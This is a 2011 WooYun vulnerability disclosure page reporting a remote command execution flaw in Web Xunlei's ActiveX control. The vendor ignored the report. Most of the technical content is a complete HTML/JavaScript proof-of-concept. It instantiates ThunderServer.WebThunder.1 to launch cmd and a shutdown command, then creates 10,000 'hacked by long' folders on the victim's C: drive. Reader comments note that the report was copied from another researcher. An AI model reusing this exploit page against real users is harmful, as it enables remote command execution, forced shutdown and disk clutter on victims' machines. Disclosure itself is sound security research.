当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01996

漏洞标题:web迅雷允许执行任意系统命令漏洞

相关厂商:迅雷

漏洞作者:

提交时间:2011-04-27 12:43

修复时间:2011-05-02 15:00

公开时间:2011-05-02 15:00

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-27: 细节已通知厂商并且等待厂商处理中
2011-05-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

受影响系统:
XunLei web迅雷

详细说明:

Web迅雷是一款基于多资源超线程技术的下载工具,它继承了迅雷5的操作方便、高速下载的特点外,同时使用全网页化的操作界面,更符合互联网用户使用习惯,是国内第一款网页上的下载工具。
Web迅雷在实现上存在设计漏洞,程序会接收攻击者提供的恶意参数直接执行,远程攻击者可利用此漏洞控制用户受影响系统

漏洞证明:

<html>
<head>
<title>迅雷执行任意系统命令</title>
</head>
<body>
运行迅雷加载项。
<script>
/**
*by long
*/
server = new ActiveXObject("ThunderServer.WebThunder.1");
if(server==null)
{
alert("没装迅雷,请安装web迅雷");
window.location.href="http://dl.xunlei.com/wxl.html";
}else{
server.OpenDirectory("cmd");
alert("要我帮你关机么?");
alert("哎呀呀!悲剧啊!你怎么不小心点了确定了?");
server.OpenDirectory("tsshutdn");
//创建无数文件夹
j = 10000;
for(i=0;i<j;i++){
server.CreatePathTree("c:\\hacked by long "+i);
}
setTimeout("alert('还愣着?赶快保存啊!')",50000);
}
</script>
</body>
</html>

修复方案:

XunLei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://dl.xunlei.com/wxl.html

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-05-02 15:00

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2011-04-27 15:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    是这个吧~~http://www.inbreak.net/archives/165

  2. 2011-05-02 19:12 | 空虚浪子心 ( 普通白帽子 | Rank:115 漏洞数:4 | 力争漏洞评论师)

    ......

  3. 2011-05-04 11:49 | CnCxzSec(衰仔) ( 普通白帽子 | Rank:322 漏洞数:32 | Wow~~~)

    提交的人连转载都不说明一下。。这让kxlzx如何是好。。

  4. 2011-05-04 11:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个人已经被屏蔽了